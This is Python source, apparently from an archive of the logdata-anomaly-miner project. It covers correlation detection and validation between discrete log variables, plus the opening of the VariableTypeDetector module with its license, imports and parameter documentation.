                        event_index][pos_var_cor_index][cor_direction][value1][-(self.num_bt-self.min_successes_bt+1):]
                    return False
        return True

    def pick_cor_match_disc_distr(self, prob_list1, prob_list2):
        """Check if the two discrete
distribution could have a possible correlation.

        Both probability lists are copied and sorted in descending order, then compared position by position over
        the common length. The allowed gap per position is match_disc_distr_threshold divided by the length of the
        longer list.
        @return False as soon as one position differs by more than the allowed gap, True otherwise.
        """
        list1 = prob_list1.copy()
        list2 = prob_list2.copy()
        list1.sort(reverse=True)
        list2.sort(reverse=True)
        for i in range(min(len(list1), len(list2))):
            if abs(list1[i]-list2[i]) > self.match_disc_distr_threshold/max(len(list1), len(list2)):
                return False
        return True

    def pick_cor_exclude_due_distr(self, prob_list):
        """Check if the discrete distribution can be expected to have possible correlation.

        Returns True for possible correlation and False to be excluded.
        A distribution is excluded when any single probability exceeds epsilon, i.e. when one value dominates.
        @param prob_list probabilities of the single values of the variable.
        """
        # Assigning epsilon: the lower limit plus the remaining mass spread evenly over all values.
        # NOTE(review): an empty prob_list raises ZeroDivisionError here — confirm callers never pass one.
        epsilon = self.exclude_due_distr_lower_limit + (1 - self.exclude_due_distr_lower_limit) / len(prob_list)
        # Check the single probabilities
        for _, val in enumerate(prob_list):
            if val > epsilon:
                return False
        return True

    def pick_cor_match_disc_vals(self, val_list1, val_list2):
        """Check through the values of the two discrete distributions if they could have a possible correlation.

        Counts the values of val_list1 that also occur in val_list2 and compares the count against
        match_disc_vals_sim_tresh times the length of the shorter list.
        @return True when the shared values exceed that threshold, False otherwise.
        """
        # `val in val_list2` scans a list, so this is O(len(val_list1) * len(val_list2)).
        if len([val for val in val_list1 if val in val_list2]) > self.match_disc_vals_sim_tresh*min(
                len(val_list1), len(val_list2)):
            return True
        return False

    def pick_cor_random(self, event_index):
        """Match variables randomly to correlation.

        Selects percentage_random_cors of all unordered pairs of discrete variables of the event type. For
        percentage_random_cors above 0.5 the complement is sampled instead and the remaining pairs are returned.
        @param event_index index of the event type whose discrete variables (self.discrete_indices[event_index]) are paired.
        @return list of [i, j] index pairs with i < j, indices into self.discrete_indices[event_index].
        """
        # List of the generated variable pairs
        tmp_list = []
        # Calculate the number of generated variable pairs
        if self.percentage_random_cors <= 0.5:
            # Calculate the number of variable pairs.
            num_total = self.percentage_random_cors * len(self.discrete_indices[event_index]) * (len(
                self.discrete_indices[event_index]) - 1) / 2
        else:
            # Calculate the number of variable pairs which are not in the resulting correlations.
            # Used to reduce the runtime for higher values of percentage_random_cors
            num_total = (1-self.percentage_random_cors) * len(self.discrete_indices[event_index]) * (len(
                self.discrete_indices[event_index]) - 1) / 2
        # Round to the nearest integer; a fractional part of exactly .5 rounds down only when the complement is sampled.
        if round(num_total % 1., 4) < 0.5 or (round(num_total % 1., 4) == 0.5 and self.percentage_random_cors >= 0.5):
            num_total = int(num_total)
        else:
            num_total = int(num_total+1)
        # Generate num_total variable pairs: redraw until enough distinct pairs with i != j (stored as [min, max]) exist.
        # NOTE(review): np.random.randint draws from NumPy's global generator and nothing here seeds it, so the
        # selected pairs differ between runs unless the generator is seeded elsewhere — confirm if reproducibility matters.
        while len(tmp_list) < num_total:
            pos_cor = np.random.randint(0, len(self.discrete_indices[event_index]), [num_total - len(tmp_list), 2])
            for _, pos_val in enumerate(pos_cor):
                if pos_val[0] != pos_val[1] and [min(pos_val[0], pos_val[1]), max(pos_val[0], pos_val[1])] not in tmp_list:
                    tmp_list.append([min(pos_val[0], pos_val[1]), max(pos_val[0], pos_val[1])])
        if self.percentage_random_cors <= 0.5:
            # Return the generated variable pairs
            return tmp_list
        # Return all variable pairs, which are not in the generated set
        return [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range(i + 1, len(self.discrete_indices[
            event_index])) if [i, j] not in tmp_list]

    def check_cor_w_rel(self, probability_list, total_pos_val):
        """Check if the probabilities can be considered a possible correlation.

        @param probability_list the probabilities observed for the right hand side of a rule.
        @param total_pos_val number of possible values of the right hand side variable.
        @return False when more than check_cor_thres * total_pos_val probabilities were observed and either
        total_pos_val exceeds check_cor_num_thres or the spread (max - min) of the probabilities is below
        check_cor_prob_thres times their mean; True otherwise.
        """
        if (self.check_cor_thres * total_pos_val < len(probability_list)) and (
                total_pos_val > self.check_cor_num_thres or max(probability_list) - min(probability_list) < (
                self.check_cor_prob_thres * sum(probability_list) / len(probability_list))):
            return False
        return True

    def validate_cor(self):
        """Validate the found correlations and removes the ones, which fail the requirements.

        Runs the validation methods named in self.used_validate_cor_meth in order; names other than
        "coverVals" and "distinctDistr" are silently skipped.
        """
        for meth in self.used_validate_cor_meth:
            if meth == "coverVals":
                self.validate_cor_cover_vals()
            elif meth == "distinctDistr":
                self.validate_cor_distinct_distr()

    def validate_cor_cover_vals(self):
        """Rate all found relation in regards to their coverage of the values in the first variable.

        It removes the ones, which have a low rating and therefore can not considered real relations.
""" for meth in self.used_cor_meth: if meth == "Rel": for event_index, event_val in enumerate(self.rel_list): for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # Check if the correlations i=i_val -> j=j_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][0][i_val].values()) for i_val in event_val[pos_var_cor_index][0]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][1][j_val].values()) for j_val in event_val[pos_var_cor_index][1]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][1] = {} elif meth == "WRel": for event_index, event_val in enumerate(self.w_rel_list): for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # Check if the correlations i=i_val -> j=j_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][0][i_val].values()) for i_val in event_val[pos_var_cor_index][0]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][1][j_val].values()) for j_val in event_val[pos_var_cor_index][1]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][1] = {} def validate_cor_distinct_distr(self): """Compare the right hand sides of the found relations. It removes the correlations, which are too similar to the distribution of the variable type. 
""" for meth in self.used_cor_meth: if meth == "WRel": for event_index, event_val in enumerate(self.w_rel_list): for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Check if the correlations i=i_val -> j=j_val are distinct enough to be considered independent # List in which the distributions of the single corrs are saved. distribution_list = [[] for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # The probabilities can be read out with: distribution_list[j_val][i_val] frequency_list = [] # List which stores the appearance of the single correlations for i_val in event_val[pos_var_cor_index][0]: if sum(event_val[pos_var_cor_index][0][i_val].values()) > self.min_values_cors_thres: # Calculates the distribution and appends it to distribution_list frequency_list.append(sum(event_val[pos_var_cor_index][0][i_val].values())) for k, k_val in enumerate(self.pos_var_val[event_index][pos_var_cor_val[1]]): if k_val in event_val[pos_var_cor_index][0][i_val]: distribution_list[k].append(event_val[pos_var_cor_index][0][i_val][k_val] / frequency_list[-1]) else: distribution_list[k].append(0) # Number of total appearances total_frequency = max(1, sum(frequency_list)) # Mean of the distributions mean_list = [sum(distribution_list[i][j]*frequency_list[j] for j in range(len(frequency_list)))/total_frequency for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # Variance of the correlations variance_list = [0 for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # Calculate the variance of the single values for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]])): variance_list[i] = sum((distribution_list[i][j] - mean_list[i])**2 * frequency_list[j] / total_frequency for j in range(len(frequency_list))) # Check if the variance exceeds the threshold if sum(variance_list) < self.validate_cor_distinct_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> 
i=i_val are distinct enough to be considered independent # List in which the distributions of the single corrs are saved. distribution_list = [[] for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # The probabilities can be read out with: distribution_list[i_val][j_val] frequency_list = [] # List which stores the appearance of the single correlations for j_val in event_val[pos_var_cor_index][1]: if sum(event_val[pos_var_cor_index][1][j_val].values()) > self.min_values_cors_thres: # Calculates the distribution and appends it to distribution_list frequency_list.append(sum(event_val[pos_var_cor_index][1][j_val].values())) for k, k_val in enumerate(self.pos_var_val[event_index][pos_var_cor_val[0]]): if k_val in event_val[pos_var_cor_index][1][j_val]: distribution_list[k].append( event_val[pos_var_cor_index][1][j_val][k_val] / frequency_list[-1]) else: distribution_list[k].append(0) # Number of total appearances total_frequency = max(1, sum(frequency_list)) # Mean of the distributions mean_list = [sum(distribution_list[i][j]*frequency_list[j] for j in range(len(frequency_list)))/total_frequency for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # Variance of the correlations variance_list = [0 for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # Calculate the variance of the single values for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]])): variance_list[i] = sum((distribution_list[i][j] - mean_list[i])**2 * frequency_list[j] / total_frequency for j in range(len(frequency_list))) # Check if the variance exceeds the threshold if sum(variance_list) < self.validate_cor_distinct_thres: event_val[pos_var_cor_index][1] = {} def print_ini_rel(self, event_index): """Print the generated correlations for the method "relations".""" message = f"Initialisation of the method relations of the event {self.event_type_detector.get_event_type(event_index)}" message += "\n%s rules have been generated for this 
event type" % ( sum(len(self.rel_list[event_index][pos_var_cor_index][0]) for pos_var_cor_index in range(len( self.rel_list[event_index])) if self.rel_list[event_index][pos_var_cor_index] != [{}, {}]) + sum(len( self.rel_list[event_index][pos_var_cor_index][1]) for pos_var_cor_index in range(len(self.rel_list[event_index])) if self.rel_list[event_index][pos_var_cor_index] != [{}, {}])) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_log_atom_values = [] for pos_var_cor_index, pos_var_cor_val in enumerate(self.rel_list[event_index]): if pos_var_cor_val != [{}, {}]: i = self.pos_var_cor[event_index][pos_var_cor_index][0] j = self.pos_var_cor[event_index][pos_var_cor_index][1] for i_val in pos_var_cor_val[0]: # Var i=i_val -> Var j=j_val if len(pos_var_cor_val[0][i_val]) > 0 and sum(pos_var_cor_val[0][i_val].values()) > self.min_values_cors_thres: sorted_log_lines.append("x) VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], repr(i_val))) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], [[j_val, pos_var_cor_val[0][i_val][j_val]] for j_val in pos_var_cor_val[0][i_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_values.append(repr(i_val)) affected_log_atom_values.append([[j_val, pos_var_cor_val[0][i_val][j_val]] for j_val in pos_var_cor_val[0][ i_val].keys()]) for j_val in pos_var_cor_val[1]: # Var j=j_val -> Var i=i_val if len(pos_var_cor_val[1][j_val]) > 0 and sum(pos_var_cor_val[1][j_val].values()) > self.min_values_cors_thres: sorted_log_lines.append("x) VarPath %s = %s" % ( 
self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], repr(j_val))) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], [[i_val, pos_var_cor_val[1][j_val][i_val]] for i_val in pos_var_cor_val[1][j_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_values.append(repr(j_val)) affected_log_atom_values.append([[i_val, pos_var_cor_val[1][j_val][ i_val]] for i_val in pos_var_cor_val[1][j_val].keys()]) if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedLogAtomValues"] = affected_log_atom_values sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def print_ini_w_rel(self, event_index): """Print the generated correlations for the method "weighted relations".""" message = f"Initialisation of the method weighted relations of the event {self.event_type_detector.get_event_type(event_index)}" message += "\n%s rules have been generated for this event type" % ( sum(len([i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if len(self.w_rel_list[event_index][ pos_var_cor_index][0][i_val]) > 0 and sum(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values()) > self.min_values_cors_thres]) for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]) if pos_var_cor_val != [{}, {}]) + sum( len([j_val for j_val in pos_var_cor_val[1] if len(pos_var_cor_val[1][j_val]) > 0 and sum( 
pos_var_cor_val[1][j_val].values()) > self.min_values_cors_thres]) for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]) if pos_var_cor_val != [{}, {}])) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_log_atom_values = [] for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]): if pos_var_cor_val != [{}, {}]: i = self.pos_var_cor[event_index][pos_var_cor_index][0] j = self.pos_var_cor[event_index][pos_var_cor_index][1] for i_val in pos_var_cor_val[0]: # Var i = i_val -> Var j = j_val if len(pos_var_cor_val[0][i_val]) > 0 and sum(pos_var_cor_val[0][i_val].values()) > 50: tmp_sum = sum(pos_var_cor_val[0][i_val].values()) sorted_log_lines.append("x) VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], repr(i_val),)) sorted_log_lines.append(" ->VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], [[j_val, pos_var_cor_val[0][i_val][j_val] / tmp_sum] for j_val in pos_var_cor_val[0][i_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_values.append(repr(i_val)) affected_log_atom_values.append([[j_val, pos_var_cor_val[0][i_val][j_val] / tmp_sum] for j_val in pos_var_cor_val[ 0][i_val].keys()]) for j_val in pos_var_cor_val[1]: # Var j = j_val -> Var i = i_val if len(pos_var_cor_val[1][j_val]) > 0 and sum(pos_var_cor_val[1][j_val].values()) > 50: tmp_sum = sum(pos_var_cor_val[1][j_val].values()) sorted_log_lines.append("x) VarPath %s = %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], repr(j_val))) sorted_log_lines.append(" ->VarPath %s = %s" % ( 
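self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]],
                            [[i_val, pos_var_cor_val[1][j_val][i_val] / tmp_sum] for i_val in pos_var_cor_val[1][j_val].keys()]))
                        affected_log_atom_paths.append(
                            self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]])
                        affected_log_atom_paths.append(
                            self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]])
                        affected_log_atom_values.append(repr(j_val))
                        affected_log_atom_values.append([[i_val, pos_var_cor_val[1][j_val][i_val] / tmp_sum] for i_val in pos_var_cor_val[
                            1][j_val].keys()])
        if len(sorted_log_lines) != 0:
            event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths))
            event_data["AffectedLogAtomValues"] = affected_log_atom_values
            sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines))
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self)

    def print_failed_wrel_test(self, event_index, pos_var_cor_index, cor_direction, value1):
        """Print the correlations which failed in a test step for the method "weighted relations".

        Reports that the rule would be rejected; the rule itself is kept. See _print_failed_wrel() for the parameters.
        """
        self._print_failed_wrel(event_index, pos_var_cor_index, cor_direction, value1,
                                "Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line")

    def print_failed_wrel_update(self, event_index, pos_var_cor_index, cor_direction, value1):
        """Print the correlations which failed in an update step for the method "weighted relations".

        Reports that the rule has been rejected. See _print_failed_wrel() for the parameters.
        """
        self._print_failed_wrel(event_index, pos_var_cor_index, cor_direction, value1,
                                "Correlation of the target_path_list %s = %s -> %s = %s has been rejected after the %s-th line")

    def _print_failed_wrel(self, event_index, pos_var_cor_index, cor_direction, value1, message_template):
        """Send one event to the anomaly event handlers for a weighted-relation rule that failed its binomial test.

        Shared body of print_failed_wrel_test() and print_failed_wrel_update(), which differ only in the message
        template they pass.
        @param event_index index of the event type the rule belongs to.
        @param pos_var_cor_index index into self.pos_var_cor[event_index] selecting the variable pair.
        @param cor_direction 0 for a rule i=i_val -> j, 1 for a rule j=j_val -> i.
        @param value1 value of the rule's left hand side; rendered with repr() in the message and event data.
        @param message_template format string taking five %s fields: left hand path, left hand value,
        right hand path, right hand distribution and the number of processed records.
        """
        cor_direction_neg = 0
        if cor_direction == 0:
            cor_direction_neg = 1
        variable_pair = self.pos_var_cor[event_index][pos_var_cor_index]
        variable_paths = self.event_type_detector.variable_key_list[event_index]
        discrete_indices = self.discrete_indices[event_index]
        source_path = variable_paths[discrete_indices[variable_pair[cor_direction]]]
        target_path = variable_paths[discrete_indices[variable_pair[cor_direction_neg]]]
        # Relative frequencies of the right hand side values; computed once and used for both the message and the event data.
        rule_counts = self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1]
        rule_total = sum(rule_counts.values())
        target_distribution = [[value2, count / rule_total] for value2, count in rule_counts.items()]
        message = message_template % (
            source_path, repr(value1), target_path, target_distribution, self.event_type_detector.total_records)
        # Mean of the test statistics homogeneity_test() recorded for this rule.
        # NOTE(review): an empty confidence list raises ZeroDivisionError here; the callers clear the list right after
        # reporting, so a report is expected only after at least one failed test — confirm against the update step.
        confidences = self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]
        confidence = sum(confidences) / len(confidences)
        event_data = {
            "EventIndex": event_index,
            "AffectedLogAtomPaths": list({source_path, target_path}),
            "AffectedValues": [repr(value1), target_distribution],
            "TypeInfo": {"Confidence": confidence},
        }
        # No log lines are attached; the list only has to match the number of processed records.
        sorted_log_lines = [""] * self.event_type_detector.total_records
        for listener in self.anomaly_event_handlers:
            listener.receive_event(
                f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self)

    def bt_min_successes(self, num_BT, p, alpha):
        """Calculate the minimal number of successes for the BT with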
significance alpha. p is the probability of success and num_BT is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_BT) i_factorial = 1 for i in range(num_BT + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_BT - i)) * ((1-p) ** i) * (p ** ( num_BT - i)) if tmp_sum > alpha: return num_BT-i return 0 VariableTypeDetector.py000066400000000000000000004557221500476301700354210ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for variable type. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import numpy as np import copy from scipy.stats import kstest, ks_2samp, norm, multinomial, distributions, chisquare import os import logging import sys import math from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil import aminer.analysis.VTDData as VTDData class VariableTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class tests each variable of the event_types for the implemented variable types. This module needs to run after the event type detector is initialized """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, used_gof_test='CM', gof_alpha=0.05, s_gof_alpha=0.05, s_gof_bt_alpha=0.05, d_alpha=0.1, d_bt_alpha=0.1, div_thres=0.3, sim_thres=0.1, indicator_thres=0.4, num_init=100, num_update=50, num_update_unq=200, num_s_gof_values=50, num_s_gof_bt=30, num_d_bt=30, num_pause_discrete=5, num_pause_others=2, test_gof_int=True, num_stop_update=False, silence_output_without_confidence=False, silence_output_except_indicator=True, num_var_type_hist_ref=10, num_update_var_type_hist_ref=10, num_var_type_considered_ind=10, num_stat_stop_update=200, num_updates_until_var_reduction=20, var_reduction_thres=0.6, num_skipped_ind_for_weights=1, num_ind_for_weights=100, used_multinomial_test='Chi', use_empiric_distr=True, used_range_test='MinMax', range_alpha=0.05, 
range_threshold=1, num_reinit_range=100, range_limits_factor=1, dw_alpha=0.05, save_statistics=True, output_logline=True, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are @param used_gof_test states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. @param gof_alpha significance niveau for p-value for the distribution test of the initialization. Recomended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param s_gof_alpha significance niveau for p-value for the sliding KS-test in the update step. Recommended values are the implemented values of crit_val_upd_ks. @param s_gof_bt_alpha significance niveau for the binomial test of the test results of the s_gof-test. @param d_alpha significance niveau for the binomialtest of the single discrete variables. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param d_bt_alpha significance niveau for the binomialtest of the test results of the discrete tests. @param div_thres threshold for diversity of the values of a variable (the higher the more values have to be distinct to be considered to be continuous distributed). @param sim_thres threshold for similarity of the values of a variable (the higher the more values have to be common to be considered discrete). 
@param indicator_thres threshold for the variable indicators to be used in the event indicator. @param num_init number of lines processed before detecting the variable types. Recommended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param num_update number of values for which the variable type is updated. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param num_update_unq number of values for which the values of type unq is unique (the last num_update + num_update_unq values are unique). @param num_s_gof_values number of values which are tested in the s_gof-test. The value has to be <= num_init, >= num_update. Recommended values are the implemented values of crit_val_upd_ks. @param num_s_gof_bt number of tested s_gof-Tests for the binomialtest of the testresults of the s_gof tests. @param num_d_bt number of tested discrete samples for the binomial test of the test results of the discrete tests. @param num_pause_discrete number of paused updates, before the discrete var type is adapted. @param num_pause_others number of paused update runs, before trying to find a new var_type. @param test_gof_int states if integer number should be tested for the continuous variable type. @param num_stop_update stops updating the found variable types after num_stop_update processed lines. If False the updating of lines will not be stopped. @param silence_output_without_confidence silences the all messages without a confidence-entry. @param silence_output_except_indicator silences the all messages which are not related with the calculated indicator. @param num_var_type_hist_ref states how long the reference for the var_type_hist_ref is. The reference is used in the evaluation. @param num_update_var_type_hist_ref number of update steps before the var_type_hist_ref is being updated. 
@param num_var_type_considered_ind this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. @param num_stat_stop_update number of static values of a variable, to stop tracking the variable type and read in the ETD. False if not wanted. @param num_updates_until_var_reduction number of update steps until the variables are tested if they are suitable for an indicator. If not suitable, they are removed from the tracking of ETD (reduce checked variables). Equals 0 if disabled. @param var_reduction_thres threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. @param num_skipped_ind_for_weights number of the skipped indicators for the calculation of the indicator weights. @param num_ind_for_weights number of indicators used in the calculation of the indicator weights. @param used_multinomial_test states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi', where 'MT' means original MT, 'Approx' is the approximation with single BTs and 'Chi' is the Chi-square test. @param use_empiric_distr states if empiric distributions of the variables should be used if no continuous distribution is detected. @param used_range_test states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. @param range_alpha significance niveau for the range variable type. @param range_threshold maximal proportional deviation from the range before the variable type is rejected. @param num_reinit_range number of update steps until the range variable type is reinitialized. Set to zero if not desired. 
@param range_limits_factor factor for the limits of the range variable type. @param dw_alpha significance niveau of the durbin watson test to test serial correlation. If the test fails the type range is assigned to the variable instead of continuous. @param save_statistics used to track the indicators and changed variable types. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, used_gof_test=used_gof_test, gof_alpha=gof_alpha, s_gof_alpha=s_gof_alpha, s_gof_bt_alpha=s_gof_bt_alpha, d_alpha=d_alpha, d_bt_alpha=d_bt_alpha, div_thres=div_thres, sim_thres=sim_thres, indicator_thres=indicator_thres, num_init=num_init, num_update=num_update, num_update_unq=num_update_unq, num_s_gof_values=num_s_gof_values, num_s_gof_bt=num_s_gof_bt, num_d_bt=num_d_bt, num_pause_discrete=num_pause_discrete, num_pause_others=num_pause_others, test_gof_int=test_gof_int, num_stop_update=num_stop_update, silence_output_without_confidence=silence_output_without_confidence, silence_output_except_indicator=silence_output_except_indicator, num_var_type_hist_ref=num_var_type_hist_ref, num_update_var_type_hist_ref=num_update_var_type_hist_ref, num_var_type_considered_ind=num_var_type_considered_ind, num_stat_stop_update=num_stat_stop_update, num_updates_until_var_reduction=num_updates_until_var_reduction, var_reduction_thres=var_reduction_thres, num_skipped_ind_for_weights=num_skipped_ind_for_weights, num_ind_for_weights=num_ind_for_weights, 
used_multinomial_test=used_multinomial_test, use_empiric_distr=use_empiric_distr, used_range_test=used_range_test, range_alpha=range_alpha, range_threshold=range_threshold, num_reinit_range=num_reinit_range, range_limits_factor=range_limits_factor, dw_alpha=dw_alpha, save_statistics=save_statistics, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not isinstance(self.event_type_detector, EventTypeDetector): msg = "event_type_detector must be an instance of EventTypeDetector." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.used_gof_test not in ("KS", "CM"): msg = "used_gof_test must be either 'KF' or 'CM'." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.used_multinomial_test not in ("MT", "Approx", "Chi"): msg = "used_multinomial_test must be either 'MT', 'Approx' or 'Chi'." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.used_range_test not in ("MeanSD", "EmpiricQuantiles", "MinMax"): msg = "used_range_test must be either 'MeanSD', 'EmpiricQuantiles' or 'MinMax'." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # Initialization of variables, which are no input parameters # Saves the minimal number of successes for the BT for the s_gof-test self.s_gof_bt_min_success = self.bt_min_successes(self.num_s_gof_bt, 1 - self.s_gof_alpha, self.s_gof_bt_alpha) # Saves the minimal number of successes for the BT for discrete values self.d_bt_min_success = self.bt_min_successes(self.num_d_bt, 1 - self.d_alpha, self.d_bt_alpha) # Number of eventTypes self.num_events = 0 # Add the variable_type_detector to the list of the modules, which use the event_type_detector. 
self.event_type_detector.add_following_modules(self) # List of the numbers of variables of the eventTypes self.length = [] # Used to keep track of the indices of the variables if the target_path_list is not empty self.variable_path_num = [] # List of the found vartypes self.var_type = [] # Stores the alternative distribution types of continuous variables self.alternative_distribution_types = [] # Stores the values the betam and special distributions. The values are needed in the s_gof test self.distr_val = [] # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type self.bt_results = [] # List of the history of variable types of the single variables. The lists to the variables take the form # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions] self.var_type_history_list = [] # Reference of a var_type_history_list. Used in the calculation of the indicator. self.var_type_history_list_reference = [] # Order of the var_type_history_list [others, static, [discrete, number of appended steps], asc, desc, unique, range, # ev of continuous distributions] self.var_type_history_list_order = ['others', 'stat', 'd', 'asc', 'desc', 'unq', 'range', 'cont'] # List of the distributions for which the s_gof test is implemented self.distr_list = ['nor', 'uni', 'spec', 